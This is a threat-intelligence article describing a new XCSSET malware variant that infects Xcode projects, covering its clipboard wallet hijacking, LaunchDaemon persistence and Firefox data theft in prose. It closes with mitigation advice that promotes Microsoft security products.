Microsoft Threat Intelligence has recently uncovered a new variant of the XCSSET malware that introduces several critical updates and modules, enhancing its capabilities beyond those highlighted in earlier reports. Designed specifically to target Xcode projects—commonly utilized by software developers—the malware activates when an Xcode project is built. This method exploits the tendency of developers to share project files, particularly for those involved in Apple or macOS app development.
The latest iteration of the XCSSET malware has made significant modifications in areas like browser targeting, clipboard hijacking, and persistence strategies. It leverages advanced encryption and obfuscation methods, along with utilizing run-only compiled AppleScripts for discreet execution. Notably, the new variant has broadened its data exfiltration scope to include data from Firefox browsers, and it has introduced an additional persistence mechanism through LaunchDaemon entries.
One striking feature of this variant is its submodule that actively monitors clipboard activities. This functionality incorporates a downloaded configuration file containing regex patterns related to various digital wallets. If the malware identifies a match with clipboard content, it can alter the content to replace it with a predetermined wallet address.
Insights shared in this report aim to inform organizations about this evolving threat. Microsoft has engaged with Apple and partnered with GitHub to dismantle repositories influenced by the XCSSET attack. This collaborative effort underscores their commitment to disrupting malicious activities and neutralizing threats.
Analysis
The newly discovered XCSSET variant adheres to a four-stage infection process. The initial three stages mirror those reported in previous iterations. This analysis begins with the fourth stage, which encompasses the boot() function, facilitating the download and execution of submodules.
Boot Function Modifications
The fourth stage’s boot() function has undergone various changes—these include additional checks for the presence of Firefox and revised logic for assessing Telegram’s existence. This stage introduces multiple new submodules that are now downloaded and executed.
In contrast, earlier versions of the boot() function are significantly simpler and less comprehensive than the latest iteration.
Info-Stealer Enhancements
The new variant’s vexyeqj submodule, previously identified as seizecj, displays various command alterations, including the disabling of several functions. Additionally, it downloads a new module—bnk—executed through osascript, which subsequently deletes the downloaded file after a short wait.
The bnk module—being a run-only compiled AppleScript—poses challenges for reverse engineering. However, tools like the AppleScript disassembler project on GitHub can facilitate its analysis.
This module encompasses functions for data validation and encryption, alongside commands for retrieving additional information from its command and control (C2) server. The decoded data appears to form a configuration file.
Upon execution, the script collects the clipboard’s content after verifying it against specific conditions. It filters the data based on several parameters, including length and matching regex patterns before exfiltrating the altered clipboard data back to the C2.
File-Stealer Module
Another submodule, neq_cdyd_ilvcmwx, retrieves additional scripts to be executed, similarly to the txzx_vostfdi module used in earlier variants targeting browsers. This script is stored in the /tmp directory, and while analysis has not yet confirmed the file list it exfiltrates, its previous iterations indicate capability for extensive data retrieval.
Persistence Mechanisms
The xmyyeqjx submodule establishes a robust persistence mechanism through the creation of a LaunchDaemon entry linked to the newly created ~/.root file. This entry functions as the vehicle for ongoing malware operations, leveraging several problematic configurations deemed critical for maintaining persistence.
Git-based Persistence Updates
The jey module’s command structure has evolved significantly. The old version directly concatenated encrypted payloads, whereas the latest version encapsulates decryption logic inside a shell function, enhancing the overall obfuscation strategy.
New Info-Stealer for Firefox
A noteworthy addition involves the introduction of the iewmilh_cdyd module, which extracts data stored by Firefox. Utilizing a modified version of the HackBrowserData project, this module can retrieve sensitive information such as passwords and browsing history.
Mitigation and Protection Guidance
Organizations can take several proactive measures to mitigate threats posed by XCSSET:
- Keep operating systems and applications updated, deploying security patches promptly.
- Scrutinize Xcode projects downloaded from external sources, ensuring their integrity.
- Exercise due caution when copying and pasting sensitive data to avoid clipboard hijacking incidents.
- Advocate for the use of browsers like Microsoft Edge with defense mechanisms such as SmartScreen to protect against malicious URLs.
- Implement Microsoft Defender for Endpoint on Mac, which can detect and combat the discussed malware.
Additionally, for users of Microsoft Defender for Endpoint, activating cloud-delivered protection and applying comprehensive PUA protections can help further reduce exposure to malicious threats.
As the landscape of cyber threats evolves, continuing the exchange of information between security stakeholders remains essential for maintaining organizational defenses.
